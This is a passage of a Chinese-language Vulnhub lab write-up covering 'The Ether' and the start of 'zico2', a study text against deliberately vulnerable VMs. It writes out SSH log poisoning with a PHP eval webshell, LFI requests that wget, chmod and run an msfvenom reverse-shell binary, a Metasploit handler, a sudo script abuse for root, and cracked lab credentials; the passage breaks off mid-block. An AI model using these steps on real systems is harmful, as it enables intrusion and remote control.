直接查看/root下的文件</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_53.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>讀取flag文件，獲得flag</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_54.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h1><a name='header-n8868' class='md-header-anchor '></a>第八節 The Ether</h1><h2><a name='header-n8869' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8870' class='md-header-anchor '></a>下載連接</h3><p><a href='http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip' target='_blank' class='url'>http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip</a></p><h3><a name='header-n8873' class='md-header-anchor '></a>運行環境</h3><ul><li>本靶機提供了VMware的鏡像，從Vulnhub下載以後解壓，運行<code>vmx</code>文件便可</li><li>靶機：本靶機默認使用了自動獲取的上網模式。運行靶機以後，將會橋接到物理網卡，接入網絡。</li><li>攻擊機：Kali虛擬機運行於virtualbox，一樣使用橋接模式，便可訪問靶機。</li></ul><h3><a name='header-n8884' class='md-header-anchor '></a>靶機說明</h3><p>本靶機有必定難度，不適合初學者。</p><p>本靶機的滲透目標爲滲透進靶機而且找到系統中隱藏的Flag值。</p><p>官方提供了一個提示：靶機中有一個相關的文件，在滲透過程當中發揮重要做用，可是不要浪費時間試圖去解密這個混淆後的文件。</p><h2><a name='header-n8891' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>首先看一下Kali的網絡配置。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277606485214.jpg' alt='' referrerPolicy='no-referrer' /></p><p>以後使用fping發現靶機。<code>fping -asg 192.168.1.0/24</code>發現有本網段有四個相關IP。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277612581371.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口掃描與服務識別</li></ul><p>使用nmap快速掃描選項（<code>-F</code>參數）掃描<code>192.168.1.0/24</code>網段</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277613128019.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據<code>Mac</code>能夠很明顯的區分，<code>192.168.1.1</code>爲TP-Link路由器，<code>192.168.1.100</code>爲蘋果設備，<code>192.168.1.101</code>爲VMware虛擬機。能夠肯定<code>192.168.1.101</code>爲目標靶機的IP。</p><p>肯定目標IP以後，使用Nmap對目標進行更加詳細的探測：
<code>nmap -A -v 192.168.1.101 -oN nmap.txt</code></p><p>解釋一下相關參數：</p><ul><li><code>-A</code> 詳細掃描目標IP，加載全部腳本，儘量全面的探測信息；</li><li><code>-v</code> 顯示詳細的掃描過程；</li><li><code>-oN</code> 將掃描結果以普通文本的格式輸出到<code>nmap.txt</code>。
結果以下：
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277637460813.jpg' alt='' referrerPolicy='no-referrer' /></li></ul><ul><li>威脅建模</li></ul><p>分析nmap的掃描結果，發現靶機只開放了<code>22</code>和<code>80</code>端口，系統爲<code>Ubuntu</code>。<code>22</code>端口爲<code>SSH</code>服務，<code>80</code>端口爲<code>http</code>服務，Web容器爲<code>Apache/2.4.18</code>。</p><p>一般Web會存在各類各樣的問題，通過初步分析，以Web做爲初步的滲透入口。</p><h2><a name='header-n8939' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n8940' class='md-header-anchor '></a>1. 使用niktoWeb漏洞掃描器</h3><p>使用nikto工具掃描Web漏洞，<code>nikto -h 192.168.1.101</code>，<code>-h</code>參數指定掃描目標。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277621096032.jpg' alt='' referrerPolicy='no-referrer' /></p><p>沒有發現什麼明顯的高危漏洞，發現了<code>images</code>目錄和<code>/icons/README</code>文件，沒有什麼利用價值。</p><h3><a name='header-n8946' class='md-header-anchor '></a>2. 使用dirb掃描網站目錄</h3><p><code>dirb http://192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277623420335.jpg' alt='' referrerPolicy='no-referrer' /></p><p>除了部分靜態文件，沒有發現有價值的利用點。</p><h3><a name='header-n8953' class='md-header-anchor '></a>3. 瀏覽網站功能</h3><p>根據前兩步基本的信息探測，並無發現漏洞點。手動訪問網站，分析網站功能。</p><p>點擊<code>ABOUT US</code>連接後，發現URL爲：<code>http://192.168.1.101/?file=about.php</code>，存在任意文件包含的可能。</p><h3><a name='header-n8958' class='md-header-anchor '></a>4. 文件包含漏洞測試</h3><p>爲了直觀的看到測試結果，這裏使用Burpsuite處理http請求。</p><p>經過嘗試包含Linux系統的配置文件，發現存在必定的限制。</p><p>如：包含<code>/etc/passwd</code>發現沒有結果。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277629489901.jpg' alt='' referrerPolicy='no-referrer' /></p><p>以後測試了幾個常見的Apache日誌的路徑：</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache/access.log</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache2/access.log</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/www/logs/access.log</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/access.log</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 100px;"></div><div class="CodeMirror-gutters" style="display: none; height: 130px;"></div></div></div></pre><p>均無結果。</p><p>猜想多是更改了配置文件的路徑，嘗試讀Apache2的配置文件，<code>/etc/apache2/apache2.conf</code>，發現也是失敗。</p><p>嘗試經過php僞協議讀取php文件源碼，也無果。</p><p><code>file=php://filter/convert.base64-encode/resource=index.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277632154094.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據以前整理的文件包含漏洞筆記利用思路:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277635091513.jpg' alt='' referrerPolicy='no-referrer' /></p><p>結合以前信息探測的結果，靶機只開通了<code>http</code>與<code>ssh</code>服務。Apache的日誌包含失敗，嘗試包含ssh的登錄日誌。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277638432449.jpg' alt='' referrerPolicy='no-referrer' /></p><p>成功讀到ssh的登錄日誌。</p><h2><a name='header-n8989' class='md-header-anchor '></a>獲取shell</h2><h3><a name='header-n8990' class='md-header-anchor '></a>1. 獲取一句話Webshell</h3><p>使用一句話做爲用戶名登錄靶機的ssh。</p><p><code>ssh '<?php eval($_GET['f']); ?>'@192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277640398321.jpg' alt='' referrerPolicy='no-referrer' /></p><p>SSH的日誌會記錄這次登錄行爲，這樣就能夠把一句話寫入ssh的日誌文件。測試一下是否成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277643786689.jpg' alt='' referrerPolicy='no-referrer' /></p><p>能夠看到一句話已經成功寫入。</p><h3><a name='header-n9003' class='md-header-anchor '></a>2. msfvenom生成Meterpreter shell</h3><p>平時使用Msf比較多，這裏也以Msf做爲接下來主要的滲透工具。</p><p>首先生成Linux平臺的shell程序。</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f elf > shell.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277683325190.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9012' class='md-header-anchor '></a>3. Metasploit 設置監聽</h3><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">use exploit/multi/handler</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">set payload linux/x86/meterpreter/reverse_tcp</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">set lhost 192.168.1.102</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">exploit</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 100px;"></div><div class="CodeMirror-gutters" style="display: none; height: 130px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699437724.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9016' class='md-header-anchor '></a>4. 種植Meterpreter shell</h3><p>首先使用Python搭建一個簡單的Web Server：<code>python -m SimpleHTTPServer 80</code></p><p>以後利用前面得到的一句話，執行命令，下載生成的木馬，而且運行。</p><p>分別發送如下請求：</p><ol start='' ><li><code>/?file=/var/log/auth.log&f=system('wget+192.168.1.102/shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('chmod+%2bx+shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('./shell.elf')%3b</code></li></ol><p>注意:</p><ol start='' ><li>由於要執行的命令裏面有空格、加號等符號，要將payload進行urlencode以後才能夠正常執行。</li><li>由於生成的木馬文件沒有執行權限，下載到靶機後也沒法執行，因此須要先給<code>shell.elf</code>添加執行權限，以後再執行。</li></ol><p>執行結果：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699964066.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Web Server及msf的結果：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277706402332.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9052' class='md-header-anchor '></a>提高權限</h2><p>Linux提權的基本思路：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9057' class='md-header-anchor '></a>1. 溢出提權</h3><p>如今拿到了目標靶機的Meterpreter shell，簡單的看下信息。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277711519803.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現系統爲<code>Ubuntu 16.04 (Linux 4.10.0-40-generic)</code>，前段時間爆了Ubuntu16.04提權的exp，在這裏試一試。</p><p>exp 地址：<a href='https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' target='_blank' class='url'>https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c</a></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277744279712.jpg' alt='' referrerPolicy='no-referrer' /></p><p>提權失敗。</p><h3><a name='header-n9070' class='md-header-anchor '></a>2. 使用msf提權</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>沒有發現能夠利用的提權漏洞。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277748088090.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9079' class='md-header-anchor '></a>3. 錯誤的SUID文件提權</h3><p>進入交互式shell，派生一個bash的shell：
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>在Web的目錄中發現了<code>xxxlogauditorxxx.py</code>，這是不該該存在的，猜想是題目所指的特殊文件，並且該文件特別大。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277741330578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>運行一下該py文件，發現是審計日誌的程序。
查看Apache2的日誌文件，發現是執行了<code>cat</code>命令，可是由於權限不夠，沒有執行成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277716185341.jpg' alt='' referrerPolicy='no-referrer' /></p><p>仔細查看py文件的權限，發現具備SUID的權限，且文件所屬用戶爲root。</p><p><code>sudo --list</code>查看一下用戶權限。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277721141332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現能夠不使用密碼便可以root權限運行該py文件。這就好辦多了。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277722533145.jpg' alt='' referrerPolicy='no-referrer' /></p><p>該py文件的配置錯誤，致使能夠直接以root權限執行命令。</p><p>接下來拿root權限的shell。</p><h3><a name='header-n9106' class='md-header-anchor '></a>4. 獲取root權限的shell</h3><p>由於以前已經上傳了Msfvenom生成的馬，這裏再次使用。首先退出<code>shell</code>，<code>background</code>命令調入後臺，而後再次開啓監聽，而且置於後臺。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277724353655.jpg' alt='' referrerPolicy='no-referrer' /></p><p>利用發現的特殊文件以root權限運行msf木馬。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">sudo ./xxxlogauditorxxx.py</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache2/access.log|./shell.elf</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277726121084.jpg' alt='' referrerPolicy='no-referrer' /></p><p>運行py以後，顯示出現問題，不過不影響運行木馬。</p><p>進入session 2的shell，查看權限：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277727104925.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9122' class='md-header-anchor '></a>獲取flag</h2><p>在root的家目錄發現了<code>flag.png</code>文件：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729121417.jpg' alt='' referrerPolicy='no-referrer' /></p><p>下載到本地進行分析：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729313511.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729611404.jpg' alt='' referrerPolicy='no-referrer' /></p><p>推測接下來的考點屬於圖片隱寫。</p><p>通過分析，在圖片文件的末尾發現了一串base64</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277730366648.jpg' alt='' referrerPolicy='no-referrer' /></p><p>將base64寫入<code>flag.txt</code>，進行解碼後get flag：</p><p><code>cat flag | base64 -d</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277731880443.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9145' class='md-header-anchor '></a>靶場思路回顧</h2><p>至此，已經完成最終目標，回頭分析一下以前幾個失敗的點。</p><h3><a name='header-n9148' class='md-header-anchor '></a>1. Web方面利用失敗緣由</h3><p>首先看一下index.php的核心代碼：</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><?php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = $_GET["file"];</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("etc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("php:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("expect:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("data:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("proc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("home","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("opt","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">if ($file == "/var/log/auth.log") {</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">header("location: index.php");</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">else{</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">?></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 468px;"></div><div class="CodeMirror-gutters" style="display: none; height: 498px;"></div></div></div></pre><p>能夠看到<code>index.php</code>將一些關鍵詞置空了。</p><p>因此，以前利用不成功的點緣由以下：</p><ul><li>僞協議讀文件失敗</li></ul><p>過濾了<code>php:</code>且大小寫敏感，故不能使用僞協議讀文件。</p><ul><li>讀取配置文件、passwd文件等失敗</li></ul><p>過濾了<code>etc</code>，沒法讀取任何配置文件</p><ul><li>讀取Apache訪問日誌失敗。</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277739100061.jpg' alt='' referrerPolicy='no-referrer' /></p><p>因權限問題，<code>www-data</code>用戶沒法寫入和讀取Apache的日誌文件。故，包含Apache日誌失敗。</p><h3><a name='header-n9176' class='md-header-anchor '></a>2. 系統方面利用失敗緣由</h3><ul><li>溢出提權失敗</li></ul><p>經過分析報錯，緣由多是由於靶機系統爲32位，但exp只支持64位系統。</p><h2><a name='header-n9183' class='md-header-anchor '></a>思路總結</h2><p>突破點總結：</p><ol start='' ><li>PHP本地文件包含漏洞發現</li><li>SSH日誌寫入一句話</li><li>利用LFI和SSH日誌getshell</li><li>MSF生成木馬，利用一句話植入、運行</li><li>利用錯誤配置SUID程序提權</li></ol><p>在完成此次靶場的過程當中，能夠有不少發散的思路，好比：</p><ol start='' ><li>文件包含漏洞，可使用字典Fuzz一下各類配置文件。</li><li>使用NC或者其餘反彈shell的姿式反彈shell。</li></ol><p>此外，Metasploit Framework有不少方便實用的功能，若是可以掌握，會大大簡化滲透的某些步驟，值得深刻學習。</p><p>整體來講，此靶場設計比較簡單。一個Web，一個SSH，利用點無非這兩個，思路比較清晰，便於實踐者完成該靶場。</p><h1><a name='header-n9215' class='md-header-anchor '></a>第九節 zico2</h1><h2><a name='header-n9217' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9218' class='md-header-anchor '></a>下載連接</h3><p> <a href='https://download.vulnhub.com/zico/zico2.ova' target='_blank' class='url'>https://download.vulnhub.com/zico/zico2.ova</a></p><h3><a name='header-n9221' class='md-header-anchor '></a>運行環境</h3><ul><li>本靶機提供了OVA格式的鏡像，官方推薦使用virtualbox，從Vulnhub下載以後，導入到viirtualbox便可運行。</li><li>靶機：修改靶機的網絡配置爲橋接模式。</li><li>攻擊機：Kali虛擬機，一樣使用橋接模式，便可訪問靶機。</li></ul><h3><a name='header-n9232' class='md-header-anchor '></a>靶機說明</h3><p>本靶機的難度爲中等。</p><p>本靶機的滲透目標爲滲透進靶機，拿到root權限，並讀取flag文件。</p><p>官方提供了一個提示：枚舉、枚舉、枚舉。</p><h2><a name='header-n9239' class='md-header-anchor '></a>信息收集</h2><ul><li><p>ip發現</p><p>首先看一下Kali的網絡配置。
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852282391.jpg' alt='' referrerPolicy='no-referrer' /></p><p>以後使用nmap發現靶機。<code>nmap -sP 192.168.1.0/24</code>發現有本網段有四個相關IP。</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852529644.jpg' alt='' referrerPolicy='no-referrer' /></p></li><li><p>端口掃描與服務識別</p><p>使用nmap快速掃描選項（<code>-F</code>參數）掃描<code>192.168.1.0/24</code>網段</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307853380399.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據<code>Mac</code>能夠很明顯的區分，<code>192.168.1.3</code>爲運行在VirtualBox上的虛擬機，即咱們構建的靶機。</p><p>肯定目標IP以後，使用Nmap對目標進行更加詳細的探測：
<code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>解釋一下相關參數：</p><ul><li><code>-A</code> 詳細掃描目標IP，加載全部腳本，儘量全面的探測信息；</li><li><code>-v</code> 顯示詳細的掃描過程；</li><li><code>-oN</code> 將掃描結果以普通文本的格式輸出到<code>nmap.txt</code>。
結果以下：
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307855078046.jpg' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>威脅建模</p><p>分析nmap的掃描結果，發現靶機開放了<code>22</code>和<code>80</code>，<code>111</code>端口，系統爲<code>Linux</code>。<code>22</code>端口爲<code>SSH</code>服務，<code>80</code>端口爲<code>http</code>服務，Web容器爲<code>Apache/2.2.22</code>。</p><p>一般Web會存在各類各樣的問題，通過初步分析，以Web做爲初步的滲透入口。</p></li></ul><h2><a name='header-n9286' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n9287' class='md-header-anchor '></a>1. 使用dirb掃描網站目錄</h3><p><code>dirb http://192.168.1.3</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307858659578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現敏感目錄<code>dbadmin</code></p><h3><a name='header-n9294' class='md-header-anchor '></a>2. 目錄遍歷漏洞</h3><p>訪問<code>http://192.168.1.3/dbadmin/</code>，發現目錄遍歷了，同時存在<code>test_db.php</code>文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307859615079.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9299' class='md-header-anchor '></a>3. 弱口令</h3><p>訪問<code>http://192.168.1.3/dbadmin/test_db.php</code>，發現是相似於MySQL的phpmyadmin，靶機的這個是sqlite的網頁版管理。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307860283151.jpg' alt='' referrerPolicy='no-referrer' /></p><p>嘗試弱口令<code>admin</code>便可進入。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307865109650.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9308' class='md-header-anchor '></a>4. phpLiteAdmin的信息收集</h3><p>查看原有的數據庫，發現裏面存在兩個帳號，使用somd5.com 解密。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307883468354.jpg' alt='' referrerPolicy='no-referrer' /></p><p>獲得如下信息：</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root 34kroot34</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span 